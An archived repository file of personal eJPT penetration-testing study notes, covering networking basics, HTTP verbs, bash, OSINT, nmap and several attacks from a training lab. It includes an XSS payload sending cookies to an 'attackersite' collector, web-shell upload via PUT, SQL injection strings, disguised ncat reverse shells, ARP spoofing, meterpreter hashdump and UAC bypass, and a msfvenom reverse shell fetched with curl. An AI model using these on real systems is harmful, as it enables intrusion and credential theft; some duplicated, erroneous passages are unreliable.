This repository has been archived by the owner on Feb 23, 2022. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 1
/
EJPT Notes
820 lines (532 loc) · 25.8 KB
/
EJPT Notes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
Packet Structure:-
Header-Contain addresses
Payload-Actual information
IPv4-4 octets
Reserved ipv4 addresses:-
0.0.0.0-0.255.255.255 - Starting and ending addresses of network
127.0.0.0-127.255.255.255-IP addresses depicting localhost(your system)
192.168.0.0-192.168.255.255-Private IP's
Router-Devices to forwarding packet, frames (depending on layer used)from one node to another
Routing-Collection of networks
Routing protocols are used for the same
Routing protocols check for the shortest path between source and destination, for travel
Inspection of destination addresses is done by the router,then sends the packet to appropriate network
Routing Table-Contains information of destination, interface, etc.
Default entry in Routing Table-0.0.0.0 - For a packet, whose destination is an unknown network
Default interface in routing table-Say an interface is receiving a packet, for a specific address. The router table has configured a default interface. So if no addresses in the table match with the destination address of the packet, the default interface receives the packet
arp -a
Data Link layer
Data is known as frames
Hubs and switches forward them
They use MAC Addresses for reference
netcat doesn't support HTTPS Connections
Web Applications:-
HTTP works over TCP and is stateless
User Agent-Browser being used to perform connection request
What do youCleartext protocol-HTTP
Not usable on website transmitting sensitive information
WireShark-For packet sniffing
We can start packet capture, examine packets, etc.
Scenario 1 Log on to a website following HTTP protocol
We are logging in, using our credentials, which is sensitive info
Packets are programmed to capture packets, before the logging process.
When we view the packets, after performing a login attempt, we can view the credential information, by examining the packet
Right click on packet ->Follow->Tcp stream
For an HTTP protocol website,(Packet is green)-the data will be visible in cleartext
For HTTPS,(Black packet)-it will be in an incomprehensible form, as it is encrypted
Packet Structure:-
Header-Contain addresses
Payload-Actual information
IPv4-4 octets
Reserved ipv4 addresses:-
0.0.0.0-0.255.255.255 - Starting and ending addresses of network
127.0.0.0-127.255.255.255-IP addresses depicting localhost(your system)
192.168.0.0-192.168.255.255-Private IP's
Router-Devices to forwarding packets, frames (depending on layer used)from one node to another
Routing-Collection of networks
Routing protocols are used for the same
Routing protocols check for the shortest path between source and destination, for travel
Inspection of destination addresses is done by the router, then sends the packet to the appropriate network
Routing Table-Contains information of destination, interface, etc.
Default entry in Routing Table-0.0.0.0 - For a packet, whose destination is an unknown network
Default interface in routing table-Say an interface is receiving a packet, for a specific address. The router table has configured a default interface. So if no addresses in the table match with the destination address of the packet, the default interface receives the packet
arp -a
Data Link layer
Data is known as frames
Hubs and switches forward them
They use MAC Addresses for reference
have in a request packet
- Type of request,with protocol version - GET,POST etc / HTTP/1.1
- Host - Hostname being requested
- Accept - Type of document being expected (txt,html forms)
- Accept Language - Human Language (/en_en/)
- Acccept Encoding - Two typesof compression - gzip and deflate
- Connection = Either keep_alive (sustain) or die
Performing packet analysis for HTTP - Netcat and Burpsuite(Repeater tool)
For netcat - Command - netcat -v <domain name > <port> -Here 80
HTTPS Packet Analysis -We use OpenSSL
Command - openssl s_client -connect <domain name>:443
Cookies
-Stored in the cookie jar of a website -Different for different websites
Format:-
Cookie Content
Expiration Date - Cookie can only be used up to this date
Path
Domain
Flag-setting attributes -Examples - HttpOnly ,Secure etc
If set a path ->The cookie also applies to /mainpath/subpath1/subpath2/and so on
Session - storing a record between C-S communication
- Has a session and token id
- This session data is stored on the server-side
-When you close a website login, the cookie for that website will be deleted immediately
Same Origin Policy -Simply states that JavaScript used on a website, cannot be used from a different origin -Or else causes client information stealing
Burpsuite
Spider-Crawl over the website.Especially if you don't know the website's layout or architecture
To backdoor a Linux Account, you need the following files:-
~/.bashrc
~/.bash_profile -Allow to set the environment properly
~/.bash_logout
Environment variables
Command- env
Some variables:-
PATH - echo $PATH- To find the path for executable files
Command - burp suite
PATH variable will look around the system, for executable files of the 'burpsuite' command. Eventually, it finds it in the /usr/bin path and will load the executable file for us
If I type in - burp suite - PATH variable will return "brpsuite: Command not found"
TO find a command's location - 'which command
To find chmod's location - which chmod -
Returns the location
Bash symbols:-
* - used in rm file*
| (pipe) - Chain two or more commands
>> - Move output to a file
.sh - Executable bash file
Always start a bash script using #!/bin/bash
Bash conditional statements
if <condition>;then <-If statement
<comands>
fi
Else and Elif commands
if (condition);then
<command>
elif (command);then
<next command>
else
<another command>
fi
Arithmetic conditional operators:-
-eq - Equal
-ne Not equal
-lt -Less than
-le -Less than or equal to
-gt- Greater than
-ge-Greater than or equal to
Declaring variables:-
x=<number>
y="<string>" <-Same as python
Simple bash program to check if two numbers are equal
#!/bin/bash
x=3
y=4
if ["$a" -eq "$b"];then
echo "They are equal";
fi
Bash conditional statements
i)For loop -Program to loop and print all items in a directory
#!/bin/bash
for i in $(ls);do
echo item;$i
done
Looping over numbers
#!/bin/bash
for i in `seq 1 10`;
do
echo $i
done
While loop - One liner commands
Eg)while read line;do echo $line; done < file.txt
Windows Command line:-
Commands- del,move,dir etc
In Windows, directories point towards \
In Linux, directories point towards /
Accessing Windows variables:-
echo %PATH% - Provides path of executables
echo %us
ername%- Provides username of the current user
-You can create variables of your own. These stay temporarily, in the current cmd window
Output generation echo <command> >> <filename>
type <filename> - View contents of a file
Command chaining:-
command 1 & command2 - Execute 100%,without regard of result
command 1 && command 2 - If executed 1'st,execute second.Else fail
command 1 | command2 - Execute 100%,without regard of result
command 1 || command 2 - If executed 1'st,execute second.Else fail
Conditional statements
-Example using setting up an environmental variable
set a variable - set y=2
if %y%==2 (echo false) ->returns false
if %y%==2 (echo false) ->returns true
if %y%==4 (echo false) ->Doesnt return anything
if %y%==4 (echo true) ->Doesnt return anything
------------------------------------------------------------------
Penetration Testing Basics
Information given out by employees - emails, phone numbers, and plans - Helps an attacker to build the technical mapping of an organization
LinkedIn - Has advanced search features - narrow professional profiles down
If you are targetting an ad agency, your target - Instagram
Other methods of OSINT:-
whois lookup
crunch database
Target organization's website
Government websites
Hunting down employee emails (following a specific pattern)
firstname.surname@organization.com - Using G+ Suite
firstletter.surname@organization.com
These are called schemas
-Helping out hackers-Address doesn't exist -after sending an email
-Narrow down your schema formats
-Mail them with something catchy, that makes them open the mail
Subdomain Enumeration tools:-
-Sublist3r
-dnsdumpster - Google tool
Google Dorks
crt.sh
-Amass
REMEMBER: WHY DO WE DO THIS? -An attacker always wants to broaden the attack surface. Enumerate as much as possible
Mapping a network
-You won't always get a fixed target address
-Sometimes a block of 65536 addresses. How do find which machine is assigned to which IP?
MAP A NETWORK - YOU DON'T KNOW WHAT IP HOSTS ARE PRESENT
How does a mapper know whether a port or a host is up/open?-By performing a ping across it
Tools:-
Use fping
-fping Command- fping -a -g <IP Range> Eg-10.10.10.10 (single)
or
10.10.10.0/24 (range)
Use Nmap
Command - nmap -sN <subnet> 10.10.10.0/24
Switches - -a = show alive hosts
-g - Ping sweep, instead of a standard ping test
-Nmap scan, with a -sN switch (ping scan) - for both single and range
OS Fingerprinting
-Nmap, using -O switch (OS Detection)
Nmap port scanning
-sT - 3-way handshake - SYN SYN+ACK ACK
-sS -Stealthy scan - Only sends SYN Packet
Target machine returns:-
RST - For closed ports
ACK - For open ports
-Pn - Ping ports
-sU - UDP Scan
-sV - Service version scan
Larger Network surface of target - more likely to have a firewall in place
Firewalls in place:-
Not able to determine open or close ports
No clarity in-service version detection of a target (machine type), same goes for a port (service version of service existing on a port)
-Masscan - Faster than Nmap, but less accurate
-Know the need of your customer -Might ask for a full pentest or a simple vulnerability assessment over their network(Just use a vulnerability scanner, or tools with --vuln find switches)
-Examples - Nessus, OpenVAS, Nexpose, and GFI LAN Gaurd
Custom Application Testing - Not some official regular software
-You have to manually test it.
-Understand its functionality, reverse engineer it's working, etc
Steps of a Nessus scan:-
-Port Scan
-Service Detection on ports
-Vulnerability check, on ports, with lookups on vulnerability databases, for verification
-Probe - To remove false positives
Website Enumeration - For eJPT
whois <domain>
or
whois <IP>
Web Server Fingerprinting
Banner Grabbing and manually powered tools - httprint and netcat
Netcat example - You want to find the server and its version
Command-nc <IP/Domain Name> 80
Then enter - HEAD / HTTP/1.0 ->Press 'enter' button two times
httprint example (I Prefer httprint.Use this)
Command - httprint -P0 -h <IP> -s /usrshare/httprint/signatures.txt
Switch meaning - P0 -Avoid pinging the web host
-s -Use signature file from httprint
or
curl -i -X -h http://<IP> - It works
Banner Grabbing for Https web servers (It works)
Tool - OpenSSL
Command-openssl s_client -connect <domain name>:443
Then type HEAD / HTTP/1.0
CHECK WHICH HTTP VERBS ARE AVAILABLE ON THE SERVER -using netcat
------------------------------------------------------------------
I use cURL
Command - curl -i -X OPTIONS http://<IP>
Shows the allowed options like Allow:
You can also use nikto
Command - nikto -h HTTP://<IP>
--------------------------------------------------------------------
nc 10.10.10.10 80
OPTIONS / HTTP/1.0
--------------------------------------------------------------------
GET - Get resource (I use cURL)
Command - curl -i -X GET http://<IP>/path/to.txt/or/.php/page
--------------------------------------------------------------------
GET /<page>.php / HTTP/1.1 page.php(singular webpage) and not the
domain name
--------------------------------------------------------------------
I prefer using curl
Command - curl -i -X GET http://<IP>/path/filetoget
-------------------------------------------------------------------
Host: <domain name>.com
You can also pass arguments to the GET verb
Example - Pass argument course=Pentest to INE
Command - GET <INE.com>?course=Pentest HTTP/1.1
Host: www.INE.com
POST - Submit some input data into a web form
POST <page>.php / HTTP/1.1
Host:<domain>com
log=admin&pass=admin
HEAD-Only receive page header and no body content
HEAD <page>.php / HTTP/1.1
Host:<domain>.com
PUT - Upload a file, onto a server - similar to FTP command
-------------------------------------------------------------------
I prefer using curl
Commmand - curl -i -X PUT http://<IP>/path/filetoupload
--------------------------------------------------------------------
PUT /wp-uploads.php/ / HTTP/1.1
Host: <domain>.com
<PUT file_to_insert>
DELETE - To delete resources from the webserver
DELETE /page.php / HTTP/1.1
Host:<domain>.php
OPTIONS - Query the webserver for enabled HTTP verbs on the server. Find what verbs are permissible to use on the server
OPTIONS / HTTP/1.1
Host:<domain>.php
REST API - Representational State Transfer Application Programming Interface - These API's can "PUT" files on the server
Enumerating options on a web server
-You can use cURL
-You can use netcat too - Command - nc <domain>.com 80
then type - OPTIONS / HTTP/1.1 -Returns the verbs/options you can do to the server
Exploiting PUT
Why? - To upload shells on the server
Constraints - Size of payload -
Command to find size - wc -m <payload/shell>.php
Then enter x <payloadname>.php
Then put the shell onto the server
PUT /path / HTTP/1.1 nc <domain>.com 80
Host:<domain>.php or
PUT /<file> PUT /<shell>.php HTTP/1.0
After uploading shell - Go to path of the uploaded shell
?cmd= <your command>
Google Hacking
site: Only belonging to a particular company
intitle: Look for specific words on the website title
inurl: Specific words in the URL address of the website
filetype: Hunt down .pdf,.xlsx, type files
AND, OR -
-(symbol) - To filter some keywords
XSS
-Steal session data
-Inject malicious code to person browsing site
-Attacker can control compromised web servers and sessions of users
-Points for vulnerability and malicious code injection-GET Parameters, cookies, POST parameters, and all use input parameters
Types:-
Reflected - Malicious Code is injected on the URL of the website. When clicked and redirected, XSS Attack takes place
Persistent - Code is sent to the vulnerable web server and then stored by the server. When asked to load the page, the payload will perform the XSS on the visitor
-Persistent = Present all the time, when a particular injected page is loaded
How to get cookies - use <script>alert(document.cookie)</script>
-In a comment field ,search field or post field - Only returns your cookies
Otheer methods of XSS:-
Reflective - <script><h2>Hi</h2></script> -Enter this in a comment field or search fields- If the comment is not sanitized, you will get a big HI comment
Another method - <script>alert("XSS!")</script> -Again on user comment area or search field
Another method - \<script> alert(\'XSS\') \</script> - In search bar
---------------------------------------------------------------------
To print your Session Cookie-ID - Infecting Feedback form
We have 2 methods:-
1)Infect Feedback form
For this task, we require a specific webpage, within the website, to store the cookies. Fortunately, INE has just done that, giving us
192.168.99.11/get.php
We also have a jar.txt file at the same IP, to store cookie id's
First, let's infect the Feedback form with the cookie stealing script
As in - Image X6
Now, we wait on http://192.168.99.11/jar.txt and get - Image X6 (1)
---------------------------------------------------------------------
2)Infect the comment field on the blog page
Enter comment - Nice Post <script> var i =New Image(): i.src="http://attackersite/get.php?cookie="+(document.cookie)"</script>
Click on POST and wait at the jar.txt page
We get the cookie ID
---------------------------------------------------------------------
Now, we need to change the current cookie id and set it to the captured admin's one.
Open Firebug - Go to cookies tab -Image X7
On the id field under Value, let's right-click and click on paste
It will open up - Image X7 (1)
Copy, paste and click Ok
We are now authenticated as Admin
---------------------------------------------------------------------
For stealing other users cookies, we cannot show the alert box to alert that a person's cookie id has been stolen
Stolen cookie ID will be stored back in a .jar file, hosted somewhere else, which is used by an attacker to log in as another user
Insert the grabbed cookie into firebug(in insert cookie field) and reload the page, to log in as someone else.
---------------------------------------------------------------------
XSS - General steps to find and test
1)Find reflection point
2)Test, with a tag
3)Test with HTML/Javascript code - (alert('XSS'))
---------------------------------------------------------------------
Two SQL Injection tests
id <-If it is a parameter /or test using other available parameters
?id=1' or 1=1; -- - OR operator (if injection exists and the parameter is vulnerable, at least one of the injection commands will be executed, giving us a SQL Error message (IF AND ONLY IF THE PARAMETER IS VULNERABLE))
?id=1' or 1=2; -- - -Gives a normal page back,because 1==2 condition is false and confirms SQL Injection is triggered,when conditions are neccesarily true)
Try the tests on sqlmap and search bar
SQL Testing technique - --technique=(Union)
Enumerate users - -users
Other important switches - -D - database
-T - Tables -C -Columns you want to view
(when not using --dump-all switch)
-Burp intercept proxy for login ->send the packet to Intruder, try meddling with the user and password parameters, using '
Like user=a' (Turn off proxy, then forward the packet, to view if you get SQL Error or not)
Then try user=a' or 1=1; -- -
Try for admin then try for password - Total 4 tries, to experiment, meddle and forward, to view response tab
Malware:-
Backdoor software used by pentesters-NetBus and SubSeven - use the backdoor to gain access and view data on the remote machine
Types:-
Trojan Horse
Bootkit - Trap your Boot up sequence and make changes to it
Greyware - Spyware + Adware +combination of both
Spyware
Adware
Keylogger
Ransomware
Rootkits - hide behind system processes, doesn't do noticeable work
For experiments, we can use ncat
-Download ncat on the target machine ->Rename installation file like to 'winconfig'
-Go to the folder, where the winconfig.exe(i.e ncat is located)
- Run it - winconfig -l -p 5555 -e cmd.exe
From attacker's machine - Run - ncat <Victim IP> 5555
If you want to listen from attacker machine:-
On target machine - winconfig -e cmd.exe <Attacker IP> 5555
On Attacker machine - Run - nc-lvp 5555
Backdoors are possible to set up on Metasploit,using
exploit /multi/handler and setting payload to /windows/meterpreter/reverse_tcp
IMPORTANT: METASPLOIT 'S METERPRETER PROMPT ALLOWS YOU TO DOWNLOAD FILES
Perform - cd /directory - traverse to the directory you want
MAKE SURE YOU ARE IN THE DIRECTORY FROM WHICH YOU WANT TO DOWNLOAD THE FILE
Command for download - download <file name> /root/ <-Download path to your machine
Also to upload files - Meterpreter> upload <filename>
Hashcat command syntax
hashcat -m <check what type of hash it is> -a <type mode> Hash file
or
hashcat -m <check what type of hash it is> -a <type mode> Hash file /wordlist/file
Password Attacks
1)unshadow
unshadow /etc/passwd shadow > unshadow
2)JohnTheRipper
Command - john -wordlist=/path/to/wordlist -users=users.txt hashfile
users.txt - Stores usernames
hashfile - Stores password hashes found in /etc/passwd or /etc/shadow
------------------------------------------------------------------
Null Shares-Exploitable element of Windows (Either on the host you are pentesting or find on Legacy systems)
-Once properly exploited, you get info about system users, groups,passwords, and running processes
NETBIOS-SSN Enumeration tool on Windows
Command to find and enumerate a Windows machine - nbtstat -A <IP>(RUN ON WINDOWS MACHINE, AFTER GAINING ACCESS TO IT)
Now to enumerate the shares,
smbclient -L //<IP> -U ""
smbclient //<IP>/Share Name
Command - NET VIEW <IP>
NETBIOS-SSN Enumeration tool on Linux
-smbclient
-enum4linux
-nmblookup - nmblookup -A <IP>
How to check for null sessions? - We target the IPC$ share, with empty credential fields (ON WINDOWS MACHINE)
Command - net use \\<IP>\IPC$ '' /u:'' (ON WINDOWS MACHINE)
If vulnerable, we gain access and the command was executed successfully
Checking the same,ON A LINUX MACHINE ,using SMBCLIENT
Command - smbclient //<IP>/IPC$ -N
Check the same, for C$ share
-Another tool to exploit Null sessions - winfo -download from packetstorm
Syntax - winfo <IP> -n
-Another tool - samrdump.py from /impacket
Syntax - python3 samrdump.py <IP>
More learning lessons - use --script=smb-brute and smb*
ARP Poisoning - Intercept and manipulate network traffic
ARP-Maps IP to MAC Address
- When sending packets, a computer makes use of both addresses
- Once MAC address resolution is complete, the destination address is stored in the ARP Cache table
Performing ARP Spoofing on Linux
-We use Dsniff tool for this.
Before running dsniff, we need to enable the Linux Kernel IP Forwarding - to enable Linux box into a router
Why? To tell your machine,to forward the intercepted packets, to the destination/target machine
Commands:-
First, open up your Wireshark and set it ip.addr == <to victim machine's IP Address>
echo 1 > /proc/sys/net/ipv4/ip_forward - To turn packet forwarding on
arpspoof -i tap0 -t <Attacker IP> -r <Target IP>
View the intercepted packets and traffic on Wireshark
-MITM Attack possibility - ARP Cache tables of two hosts performing communication are infiltrated,then the attacker can sniff and monitor communication
-This attack is performed using gratious ARP replies
-Gratious ARP replies - Attacker sends reply, without waiting for the recipient to perform a request
Modus Operandi:-
- ARP message is sent by the attacker to all hosts on a network(that a particular host/IP can be reached, by using the MAC address available at the attacker's machine)
-As soon as the ARP cache table contains false information, every communication between poisoned nodes will be sent to the attacker's machine
-Attacker can prevent the poisoned entry from the ARP table from expiring, by sending a gratious ARP reply every 30s
-Once the attacker receives the communication packets, it needs to forward them to the correct destination
ARP Spoofing tool-DSniff Arpspoof(Setup and working is explained)
To perform an ARP Spoofing attack, you need
Wireshark and ARPSpoof tool
Start Wireshark, keep running in backgrounf
First step - Enable forwarding of IP packets to target
Command- echo 1 > /[roc/sys/net/ipv4/ip_forward
Next,perform a spoofing attack
Command- arpspoof -i eth0 -t <Source/Attacker IP> -r <Target IP>
eth0-running both machines on an ethernet interface
Then, run/do some operations on the target, on a login page, or accessing network shares
Wireshark captures traffic on the background
If you have generated HTTP traffic, then filter Wireshark traffic by 'HTTP
Click on the Export option on Wireshark. You will see the uploads/downloads done on the HTTP Server
-Click on 'save as'.Go to your terminal and you will be able to access the file uploaded/downloaded from the target machine, on your machine
Very important - show payloads - when inside an exploit
Meterpreter:=
getsystem command - Usable on Windows-based machines, to escalate privileges. ONLY WHEN ROOTING WINDOWS BOXES
Command - meterpreter> getsystem - Privilege escalate
If it doesn't work? Why? -Because User Account Control Policy prevents privilege escalation
ERROR MESSAGE YOU GET priv_elevate_getsystem: Operation failed: The environment is incorrect.
Now check if the current user has UAC enabled. From the meterpreter prompt, run
Command - run post/windows/gather/win_privs
IF UAC enabled = true, you need to bypass it
How to bypass?
use exploit/windows/local/bypassuac
(Remember to have a session already open, after successfully running the exploit, on the vulnerable component, using Metasploit's exploits. MAKE SURE YOU HAVE THE METERPRETER> PROMPT)
.How do you do that? - Command - background - Sets session 1 aside and helps you start a new one.
-Show options
Set the session ID of that session and exploit - Allows you to bypass User Account Control
Then perform the 'getsystem' command on the meterpreter prompt
Dumping password database -utility of meterpreter shell
ONLY USABLE WHILE ROOTING WINDOWS MACHINES
- Create a session(for the vulnerability, on Metasploit). Set options, exploit it, and make sure you get the meterpreter> prompt
-Command = background - Sets this session on the background and helps start a new one
use post/windows/gather/hashdump
-Show options
- set the session id of the session you just set to the background
-exploit
Other commands:-
background - Background the current session
sessions -l
sessions -i <number>
sysinfo
ifconfig
route
getuid
download files
upload files
shell
cURL -utility to download files, from a web shell, which is vulnerable and responsive
Usage - Either after ? or enter into the whitespace offered by a web shell
Command - curl http://<IP>:<port> /path/of/file/to/download -T /path/to/store/in
MAKE SURE TO HAVE YOUR NETCAT LISTENER READY ON THE PORT
Creating a payload, using msfvenom - for listener
Command-msfvenom -p linux/x64/shell_reverse_tcp lhost= lport= -f elf -o <name of file you want to save as>
Upload and save it on the target's machine
First, start the SimpleHTTPServer on port 80
On the browser- Command-curl http://<YourIP>:80/shellfile -o /directory/on/target/to/save/on
Change permissions, to make it executable
Command = chmod 700 /directory/of/target/where/thefile/is/saved
Now set your netcat to listener mode - nc -lvp 4444
Now go to the browser and just type the directory/path/of/uploaded/script file
Why? - We already set the IP and port to listen on, in the msf payload. So just set your netcat to listen on the same port, while
entering the uploaded shell path on the web shell
Two ways to upgrade your shell
bash -i or python one=liner